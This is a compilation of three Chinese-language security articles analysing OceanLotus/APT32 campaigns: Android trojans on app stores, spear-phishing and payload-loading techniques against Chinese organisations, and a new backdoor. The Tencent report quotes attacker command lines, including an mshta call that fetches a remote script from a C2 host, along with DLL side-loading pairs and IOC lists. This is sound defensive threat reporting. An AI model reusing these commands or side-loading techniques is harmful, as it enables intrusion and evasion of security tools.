2014年以来，海莲花（OceanLotus）APT组织（或被称为PhantomLance）就以通过官方和第三方市场传播高级Android威胁而闻名。他们试图远程控制受感染的设备、窃取机密数据、安装应用程序并启动任意代码。 安全研究人员最近记录了该组织的活动，Bitdefender调查发现了该组织35个新的恶意样本，并证明其活动可能使用了合法且可能被盗的数字证书来对某些样本进行签名。 该APT组织的作案手法是先上传干净版本，然后添加恶意软件，然后通过Google Play和第三方市场传播恶意Android应用。 安全研究人员认为，海莲花APT组织与Android恶意软件和过去基于Windows的高级威胁的命令和控制域之间的共享基础结构相关联，这些威胁过去一直以Microsoft用户为目标。可以说，这些较早的活动也与Hacking Team组织有联系，该组曾为APT32组织服务。 虽然海莲花主要针对非洲和亚洲，但Bitdefender遥测技术还可以在日本、韩国、越南、德国和印度等国家进行扫描。 Bitdefender 检测到此威胁为  Android.Trojan.OceanLotus。 寻找“零号病人” 在Bitdefender存储库（APK MD5：315f8e3da94920248676b095786e26ad）中找到的，与海莲花APT组织所关联的最古老的样本似乎已于2014年4月首次登陆Google Play 。可追溯到最早的已知Google Play样本在2014年12月。 根据内部zip文件时间戳记，该样本构建于2014年4月5日，几天后就被我们记录下。 一个有趣的发现是，该样本已使用VL Corporation的证书进行了签名。 该证书于2013年7月生成，并且直到2014年为止，除OceanLotus Malware以外，Google Play上已有100多个不同的应用程序在使用它。这表明网络犯罪集团可能已使用有效证书成功地将恶意病毒app走私到了Google Play中。 Certificate:      Data:          Version: 3 (0x2)          Serial Number: 2002933886 (0x7762587e)          Signature Algorithm: sha256WithRSAEncryption          Issuer: C=VN, ST=10000, L=HN, O=VL Corporation, OU=VL Corporation, CN=VL Corporation          Validity              Not Before: Jul 22 18:57:09 2013 GMT              Not After : Jul 16 18:57:09 2038 GMT          Subject: C=VN, ST=10000, L=HN, O=VL Corporation, OU=VL Corporation, CN=VL Corporation 他的证书很可能已被该APT组织泄漏和滥用。目前，在Google Play中使用此证书签名的100多个应用程序中，仍然没有该应用程序。 目标国家 在遥测方面，仅在过去的3个月中，我们就收到25篇涉及此威胁的报告，其中大多数是在美国、日本和韩国。显然，在美国的报告可能不是真实的设备，但亚马逊托管的Android计算机被操纵来运行样本以进行安全分析，对于安全研究人员而言，执行这种沙箱操作并不少见，特别是在尝试获取危害指标或研究恶意行为时。 但是，韩国和日本的报告确实表明，最近遇到过海莲花APT样本的设备至少数量有限。 Android OceanLotus报告威胁的十大国家 追踪传播 在传播方面，虽然安全研究人员已经报告说恶意软件的发行是通过官方的Google Play市场和第三方市场进行的，但一些与Google Play相似的市场仍在托管这些样本。这意味着，尽管Google在及时管理其应用程序并响应安全研究人员和供应商方面做得很出色，但第三方市场（如果有的话）缓慢地消除了这些威胁，甚至有可能无限期地使用户暴露于恶意软件中。 仍托管这些恶意样本的第三方市场的一些样本包括： hxxps：//apkpure.com/opengl-plugin/net.vilakeyice.openglplugin hxxps：//apk.support/app/net.vilakeyice.openglplugin hxxps：//apkplz.net/app/com.zimice.browserturbo hxxps：//apk.support/app/com.zimice.browserturbo hxxps：//androidappsapk.co/download/com.techiholding.app.babycare/ hxxps：//www.apkmonk.com/app/com.techiholding.app.babycare/ hxxps：//apkpure.com/cham-soc-be-yeu-babycare/com.techiholding.app.babycare hxxps：//apk.support/app-th/com.techiholding.app.babycare 虽然已经有了海莲花APT组织的样本完整列表，我们知道这些样本已出现在Google Play中，但我们添加了以下一些内容，这些内容也已在Google Play上得到确认。 由Bitdefender研究人员发现的海莲花APT组织的其他新样本的md5完整列表如下： 3043a2038b4cb0586f5c52d44be9127d f449cca2bc85b09e9bf4d3c4afa707b6 76265edd8c8c91ad449f9f30c02d2e0b 5d909eff600adfb5c9173305c64678e7 66d4025f4b60abdfa415ebd39dabee49 7562adab62491c021225166c7101e8a1 7b8cba0a475220cc3165a7153147aa84 63e61520febee25fb6777aaa14deeb4a 9236cf4bf1062bfc44c308c723bda7d4 f271b65fa149e0f18594dd2e831fcb30 e6363b3fae89365648b3508c414740cd d9e860e88c22f0b779b8bacef418379e 3d4373015fd5473e0af73bdb3d65fe6a a57bac46c5690a6896374c68aa44d7b3 08663152d9e9083d7be46eb2a16d374c 18577035b53cae69317c95ef2541ef94 eee6dcee1ab06a8fbb8dc234d2989126 5d07791f6f4d892655c3674d142fe12b f0ea1a4d81f8970b0a1f4d5c41f728d8 320e2283c8751851362b858ad5b7b49c 1fb9d7122107b3c048a4a201d0da54cd bb12cc42243ca325a7fe27f88f5b1e1b 01b0b1418e8fee0717cf1c5f10a6086b 4acf53c532e11ea4764a8d822ade9771 6ff1c823e98e35bb7a5091ea52969c6f 1e5213e02dd6f7152f4146e14ba7aa36 3fe46408a43259e400f7088c211a16a3 c334bade6aa52db3eccf0167a591966a 53ba3286a335807e8d2df4aae0bd0977 7f59cb904e2e0548b7f0db12c08b9e25 49d1c82a6b73551743a12faec0c9e8b1 6b323840d7cb55bb5c9287fc7b137e83 2e1ed1f4a5c9149c241856fb07b8216b 6737fba0f2b3ea392f495af9a0aa0306 bda442858c33ae7d9f80227c55f6a584 规避Google Play保护 攻击者通常向Google Play提交一个干净的版本，然后随机等待一段时间，再简单地使用恶意代码更新应用程序。网络犯罪分子似乎也使用了这种策略。 例如，应用程序net.vilakeyice.openglplugin（OpenGLPlugin）最初于 2018 年8月5 日以纯净格式上传，然后在8月21日引入了恶意payload。 APK Seen on Google Play No Payload 7285f44fa75c3c7a27bbb4870fc0cdca 2018.08.05 With Payload d924211bef188ce4c19400eccb6754da 2018.08.21 然后，将payload解密并动态加载到应用程序中。如果较旧的样本将解密密钥本地嵌入在原始的干净应用程序中，则较新的样本将不再将其存储在本地，因为它们似乎接收了解密密钥以及恶意payload。 归因和可用性 尽管这些Android恶意软件样本的归属已经成为安全行业分析的主题，但海莲花APT组织已经被标记为幕后主谋。不过样本仍存在于第三方市场这一事实应当引起注意。 某些时候Google Play上的某些样本目前仍可在第三方市场上获得，  包括在Amazon上。在世界各地可能无法从官方Google Play市场访问内容的地区，用户仍然有感染这种恶意软件的风险。 在亚马逊印度的这个特定样本中，开发人员名称为Caleb Eisenhauer（假名），该应用程序似乎已于 2020 年2月16日发布。与该帐户关联的电子邮件地址（malcesshartspur@gmail.com）发送至托管在GitHub（https://github.com/malcesshartspur）上的隐私政策。 可能存在类似的虚假开发者帐户，它们都在第三方市场上散布了各种样本，如果不删除，有可能在很长一段时间内感染受害者。     消息来源：Bitdefender， 译者：吴烦恼 本文由 HackerNews.cc 翻译整理，封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

感谢腾讯御见威胁情报中心来稿！ 原文：https://mp.weixin.qq.com/s/OA09fndsHfpLVxeo7DnjYg   一、概述 “海莲花”（又名APT32、OceanLotus），被认为是来自越南的APT攻击组织，自2012年活跃以来，一直针对中国大陆的敏感目标进行攻击活动，是近几年来针对中国大陆进行攻击活动最活跃的APT攻击组织，甚至没有之一。 腾讯安全御见威胁情报中心曾在2019年上半年发布过海莲花组织2019年第一季度攻击活动报告，在报告发布之后一直到现在，我们监测到该组织针对中国大陆的攻击持续活跃。该组织的攻击目标众多且广泛，包括中国大陆的政府部门、海事机构、外交机构、大型国企、科研机构以及部分重要的私营企业等。并且我们监测到，有大量的国内目标被该组织攻击而整个内网都沦陷，且有大量的机密资料、企业服务器配置信息等被打包窃取。 此外我们发现，该组织攻击人员非常熟悉我国，对我国的时事、新闻热点、政府结构等都非常熟悉，如刚出个税改革时候，就立马使用个税改革方案做为攻击诱饵主题。此外钓鱼主题还包括绩效、薪酬、工作报告、总结报告等。 而从攻击的手法上看，相对第一季度变化不是太大，但有一些小的改进，包括攻击诱饵的种类、payload加载、绕过安全检测等方面。而从整体攻击方式来看，依然采用电子邮件投递诱饵的方式，一旦获得一台机器的控制权后，立即对整个内网进行扫描和平移渗透攻击等。这也进一步说明了APT攻击活动不会因为被曝光而停止或者有所减弱，只要攻击目标存在价值，攻击会越来越猛烈，对抗也会越来越激烈。 有关海莲花APT组织2019年对中国大陆攻击情况的完整技术报告，请参考： https://pc1.gtimg.com/softmgr/files/apt32_report_2019.pdf 二、攻击特点 2.1  钓鱼邮件的迷惑性 海莲花组织擅长使用鱼叉攻击，通过大量精准发送钓鱼邮件来投递恶意附件的方式进行攻击。整个2019年，持续对多个目标不断的进行攻击，如下列钓鱼邮件： 从邮件主题来看，大部分邮件主题都非常本土化，以及贴近时事热点。邮件主题包括： 《定-关于报送2019年度经营业绩考核目标建议材料的报告》、《组织部干部四处最新通知更新》、《关于2019下半年增加工资实施方案的请示（待审）》、《2019年工作报告提纲2(第四稿)》、《2019年5月标准干部培训课程通知》等等。 我们在2019年第一季度的报告中还提到海莲花组织采用敏感内容主题钓鱼邮件，不过在之后的攻击中并未再次发现使用该类型诱饵： 此外，投递钓鱼邮件的账号均为网易邮箱，包括126邮箱和163邮箱，账号样式为：名字拼音+数字@163（126）.com，如： Sun**@126.com、yang**@126.com、chen**@126.com、zhao**@163.com、reny**@163.com等。 2.2  诱饵类型的多样化 海莲花组织所使用的诱饵类型众多，能想到的诱饵类型海莲花几乎都用过。除了我们在第一季度报告里提到的白加黑、lnk、doc文档、WinRAR ACE漏洞（CVE-2018-20250）的压缩包等类型外，之后的攻击中还新增了伪装为word图标的可执行文件、chm文件等。 可执行文件诱饵： Chm诱饵： 白加黑诱饵： 带有宏的恶意office文档： 恶意lnk： 带有WinRAR ACE（CVE-2018-20250）漏洞的压缩包： 2.3  载荷执行方式多变 由于诱饵的多样化，载荷执行的方式也多变。此外第二阶段的加载方式同样方式众多。 1、 直接执行可执行文件 如该诱饵，伪装为word图标的可执行文件，并在文件描述里修改成了Microsoft DOCX，用于迷糊被钓鱼者。执行恶意文件后，会释放诱饵文档2019年5月标准干部培训课程通知.docx，并且打开，让受害者以为打开的就是word文档。而打开后的文档为模糊处理的文档，诱使受害者启用文档中的宏代码以查看文档内容，实际上启用宏之后，仍然看不到正常的内容： 2、 使用rundll32加载恶意dll 如某诱饵在执行后，会在C:\Users\Administrator\AppData\Local\Microsoft目录释放真正的恶意文件{1888B763-A56C-4D4B-895C-2092993ECCBA}.dll，然后使用rundll32来执行该dll：”C:\Windows\system32\rundll32.exe” “C:\Users\ADMINI~1\AppData\Local\Microsoft\{1888B763-A56C-4D4B-895C-2092993ECCBA}.dll”,Register 3、 宏 使用宏来执行载荷，且宏代码经过的混淆处理： 4、 Office内存执行恶意shellcode 使用宏代码，在office中直接解密shellcode，在内存中创建线程执行： 5、 dll侧加载（白加黑） 使用dll侧加载（DLL Side-Loading）技术来执行载荷，通俗的讲就是我们常说的白加黑执行。 其中所使用的宿主文件对包括： 白文件原名 黑dll文件名 iTunesHelper.exe AppVersions.dll SGTool.exe Inetmib1.dll Rar.exe ldvptask.ocx GoogleUpdate.exe goopdate.dll 360se.exe chrome_elf.dll Winword.exe wwlib.dll rekeywiz.exe mpr.dll wps.exe krpt.dll wechat.exe WeChatWin.dll 6、 通过com技术执行 通过com技术，把某恶意dll注册为系统组建来执行： 7、 Chm内嵌脚本 Chm执行后，会提示执行ActiveX代码： 其脚本内容为： 不过由于编码处理的问题，该chm打开后为乱码： 而通过手动解压后，原始内容如下： 8、 使用计划任务进行持久性攻击 如上面的chm诱饵执行后，会在%AppData%\Roaming下释放文件bcdsrv.dll，然后创建名为MonthlyMaintenance的计划任务： 命令行为：C:\Windows\System32\msiexec.exe -Y C:\Users\Administrator\AppData\Roaming\bcdsrv.dll bcdsrv.dll为真正的恶意文件。 9、 lnk调用mstha执行 该方法的详细分析在之前的《海莲花2019年第一季度攻击披露》： 执行lnk后，会调用命令：C:\Windows\SysWOW64\mshta.exe http://api.baidu-json.com/feed/news.html，而news.html实际为一个vbs脚本文件。 10、 使用odbcconf.exe加载文件： odbcconf.exe为系统自带的一个文件，该文件可以用来执行dll文件，而由于宿主进程为系统文件，因此可以逃避一些安全软件的拦截： 11、WinRAR ACE（CVE-2018-20250）漏洞 带有该漏洞的压缩包，可以构造为：解压后除了会解压出正常的文件外，再在启动目录（C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup）释放一个自解压文件： 该文件为一个自解压程序，等启动后，会释放一个{7026ce06-ee00-4ebd-b00e-f5150d86c13e}.ocx文件，然后执行命令regsvr32 /s /i {7026ce06-ee00-4ebd-b00e-f5150d86c13e}.ocx执行： 2.4  多重载荷攻击 我们在最新的攻击活动中，我们首次发现海莲花使用了多重载荷的攻击。 之前的攻击活动中，都是解密shellcode后，就直接执行最终的RAT，如： 而在最新的攻击活动中，我们发现，解密shellcode后，会先下载shellcode执行，如果下载不成功，再来加载预先设定好的RAT： 这样使得攻击活动更加的丰富和多样性，并且也可控。 2.5  与安全软件对抗激烈 海莲花也采用了多种对抗安全软件的方式，主要为： 1、 dll的侧加载（白加黑） 该技术上面已详细描述，这里不再赘述。 2、 使用系统文件来执行： 如odbcconf.exe 3、 Office中直接内存执行shellcode 上文也已经描述，这里也不再展开。 4、 添加垃圾数据以扩充文件大小 为了防止该文件被安全厂商收集，海莲花组织特意在某些文件的资源中添加大量的垃圾数据的方式以扩充文件大小。 如某文件，填充垃圾数据后，文件大小高达61.4 MB (64,480,256 字节)： 5、 每台机器的第二阶段后门都是定制的 每台机器的第二阶段后门文件都是根据当前机器的机器属性（如机器名）来加密定制的，因此每台机器上的文件hash都是不一样，且没这台机器的相关信息则无法解密。因此且即便被安全厂商捕捉，只要没有这台机器的相关遥感数据就无法解密出真正的payload。详细的见后文的”定制化后门”部分。 6、 通信的伪装 如某次攻击中C2的伪装：根据配置信息，可进行不同的连接和伪装，对C2进行拼装后再进行解析。拼接方式为（xxx为配置C2）： {rand}.xxx www6.xxx cdn.xxx api.xxx HTTP Header的伪装： 2.6  定制化的后门 使用定制化的后门（主要是第二阶段下发的后门），海莲花组织在2019年所使用的技术中最令人印象深刻的。该技术我们曾经在《2019年海莲花第一季度攻击报告》中首次曝光：针对每台机器下发的恶意文件，都使用被下发机器的相关机器属性（如机器名）进行加密，而执行则需要该部分信息，否则无法解密。因此每个下发的恶意文件都不一样，而且即便被安全厂商捕捉，只要没有该机器的相关遥感数据就无法解密出真正的payload。 该后门最终使用白加黑的方式来执行，包括AdobeUpdate.exe+goopdate.dll、KuGouUpdate.exe+goopdate.dll、 XGFileCheck.exe + goopdate.dll、SogouCloud.exe+ inetmib1.dll等组合来执行。 加密流程为： 可以看到，某次针对国家某单位的攻击中，使用的密钥为： 而该受害的用户名为Cao**，可见该木马只专门为了感染该电脑而特意生成的。 2.7  多种恶意软件的选择 从我们的长期跟踪结果来看，海莲花组织使用最终的恶意软件（无论是第一阶段后门还是第二阶段后门）主要有三种，分别是CobaltStrike的beacon木马、Denis家族木马、修改版的Gh0st。其中CobaltStrike和Denis使用的最多，而修改版的Gh0st则比较少见。 CobaltStrike： Denis： 修改版Gh0st： 2.8  持续的内网渗透 通过钓鱼攻击攻陷一台主机后，海莲花还会不断对被攻击的内网进行渗透攻击活动，以此来渗透到更多的内网机器： 扫描： 获取hash： 打包文件： 此外，还会还会通过powershell，创建计划任务来下载持久化的工具： 最终的恶意文件为goopdate.dll，跟上文所述的第二阶段下发后门一致。 三、可能存在的假旗活动 在跟踪海莲花的过程中，我们还发现了一些跟海莲花活动类似的攻击： 如: 可以看出该批活动跟海莲花的类似：如关键字、使用白加黑等。 而该文件最终的执行的恶意代码为两种： 一种是CobaltStrike生成的Beacon payload； 另一种是metasploit生成的block_reverse_http的paylaod。 虽然CobaltStrike的Beacon木马海莲花组织一直在进行使用，但是之前未发现有metasploit生成的payload，这似乎跟之前的海莲花攻击活动又有些不一致。 此外该批活动的c2都在中国境内（包括中国香港），这似乎跟之前的攻击活动也不大一样： 虽然这波活动在极力模仿海莲花的一些攻击行为，但是也依然存在不同的地方。因此暂未有更多的证据可以表明该活动归属于海莲花还是其他组织使用的假旗（false flag）活动。因此在这先不做定论，等待更多的证据和关联的依据。 四、总结 海莲花组织是近年来针对中国大陆的敏感部门进行攻击最活跃的APT组织，甚至没有之一。当然该组织也是被安全公司曝光的针对中国大陆攻击活动报告最多的APT攻击组织。尽管被安全厂商频繁曝光，该组织并未有停手迹象，反而不断更新其技术和武器库，包括诱饵、payload、新的漏洞利用等，此外也有众多跟杀软的对抗手段，如自增文件大小、混淆方式、定制化的payload等。 因此我们提醒相关部门和相关人员，切记提高安全意识，不要随意执行来历不明的邮件的附件，不要被钓鱼信息所蒙蔽。 五、安全建议 1、 提升安全意识，不要打开来历不明的邮件的附件；除非文档来源可靠，用途明确，否则不要轻易启用Office的宏代码； 2、 及时安装操作系统补丁和Office等重要软件的补丁； 3、 使用杀毒软件防御可能得病毒木马攻击，对于企业用户，推荐使用腾讯御点终端安全管理系统。腾讯御点内置全网漏洞修复和病毒防御功能，可帮助企业用户降低病毒木马入侵风险； 4、 推荐企业用户部署腾讯御界高级威胁检测系统及时捕捉黑客攻击。御界高级威胁检测系统，是基于腾讯安全反病毒实验室的安全能力、依托腾讯在云和端的海量数据，研发出的独特威胁情报和恶意检测模型系统。（https://s.tencent.com/product/gjwxjc/index.html） 六、附录 6.1  腾讯御见威胁情报中心 腾讯御见威胁情报中心，是一个涵盖全球多维数据的情报分析、威胁预警分析平台。依托腾讯安全在海量安全大数据上的优势，通过机器学习、顶尖安全专家团队支撑等方法，产生包括高级持续性攻击（APT）在内的大量安全威胁情报，帮助安全分析人员快速、准确对可疑事件进行预警、溯源分析。 腾讯御见威胁情报中心公众号自开号以来，发布了大量的威胁分析报告，包括不定期公开的针对中国大陆目标的APT攻击报告，无论是分析报告的数量上还是分析报告的质量上，都处于业界领先水平，受到了大量客户和安全专家的好评，同时发布的情报也经常被政府机关做为安全预警进行公告。 以下是腾讯御见威胁情报中心公众号的二维码，关注请扫描二维码： 6.2  IOCs MD5： e7920ac10815428de937f2fca076b94c 4095b9682af13ca1e897ca9cc097ec69 b96de3d0023542f8624b82b9773373e9 5c5f8c80dcb3283afeb092cb0c13a58a c90c7abcee1d98a8663904d739185d16 d249411f003d05c0cea012c11ba13716 3489140891e67807c550aa91c67dc4ad 22f8736bbc96c1a58ab07326d730a235 dade969b00cbc4a0c1b58eeb0e740b63 3c3b2cc9ff5d7030fb01496510ac75f2 d604c33d6ec99a87a672b3202cb60fa7 861fc5624fd1920e9d9cc7a236817dd7 8e2b5b95980cf52e99acfa95f5e1570b 3c8b2d20e428f8207b4324bb58f5d228 a81424e973b310edd50aed37590f4b8a cf5d6d28c388edf58e55412983cf804a 6b8bec74620fbf88263b48c5a11b682e 9eb55481a0b5fcd255c8fb8de1042f88 5c00063b11c4710fe5a5a1adaf208b12 d30bc57624d233d94dc53a62908ef2df 886d0dd67e4cf132a1aed84263d661e3 2b3c5c831eb6b921ac128c4d44d70a7a 1dfb41e5919af80c7d0fa163a90e21e5 C&C： 360skylar.host wechats.asis news.shangrilaexports.com clip.shangweidesign.com jcdn.jsoid.com libjs.inquirerjs.com baidu-search.net sys.genevrebreinl.com ad.ssageevrenue.com tel.caitlynwells.com us.melvillepitcairn.com upgrade.coldriverhardware.com cdnwebmedia.com 43.251.100.20 43.254.217.67 114.118.80.233 6.3  MITRE ATT&CK Tactic ID Name Initial Access T1193 Spearphishing Attachment Execution T1106 Execution through API T1129 Execution through Module Load T1203 Exploitation for Client Execution T1085 Rundll32 T1204 User Execution T1223 Compiled HTML File T1053 Scheduled Task T1117 Regsvr32 Persistence T1179 Hooking T1053 Scheduled Task T1060 Registry Run Keys / Startup Folder Defense Evasion T1107 File Deletion T1140 Deobfuscate/Decode Files or Information T1036 Masquerading T1112 Modify Registry T1027 Obfuscated Files or Information T1085 Rundll32 T1099 Timestomp T1117 Regsvr32 Credential Access T1179 Hooking T1056 Input Capture Discovery T1083 File and Directory Discovery T1046 Network Service Scanning T1135 Network Share Discovery T1057 Process Discovery T1082 System Information Discovery T1007 System Service Discovery Lateral Movement T1534 Internal Spearphishing Collection T1005 Data from Local System T1025 Data from Removable Media T1123 Audio Capture T1056 Input Capture T1113 Screen Capture T1115 Clipboard Data Command and Control T1043 Commonly Used Port T1094 Custom Command and Control Protocol T1024 Custom Cryptographic Protocol T1001 Data Obfuscation T1065 Uncommonly Used Port 6.4  参考链接 https://s.tencent.com/research/report/715.html      

外媒3月14日消息，安全公司 ESET 发布分析报告称 OceanLotus APT 组织（“ 海莲花 ”，也被称为 APT32 和 APT- c -00） 在其最近的攻击活动中使用了新的后门，旨在获得远程访问以及对受感染系统的完全控制权。 OceanLotus 组织自 2013 年起至今一直保持活跃状态，据有关专家介绍，该组织是一个与越南有关的国家资助的黑客组织，其中大部分分布在越南、菲律宾、老挝和柬埔寨。根据调查，OceanLotus 除了针对多个行业的组织之外，也针对外国政府、持不同政见人士和记者。 目前来看，OceanLotus 的攻击分两个阶段进行，第一阶段黑客利用一个通过鱼叉式钓鱼信息传递的 dropper 来获得目标系统的初始据点，第二个阶段是其恶意代码为部署后门做好准备。   △ dropper 部分有以上执行流程 △ 后门有以上执行流程 目前 OceanLotus 会在其攻击活动中不断更新工具集，这显示了该组织通过选择目标保持隐藏的意图。此外，OceanLotus 也限制其恶意软件的分发以及使用多个不同的服务器来避免将注意力吸引到单个域名或 IP 地址。 ESET 分析报告： 《 ESET_OceanLotus.pdf 》 消息来源：Security Affairs.，编译：榆榆，校审：FOX; 本文由 HackerNews.cc 编译整理，封面来源于网络； 转载请注明“ 转自 HackerNews.cc ” 并附上原文链接。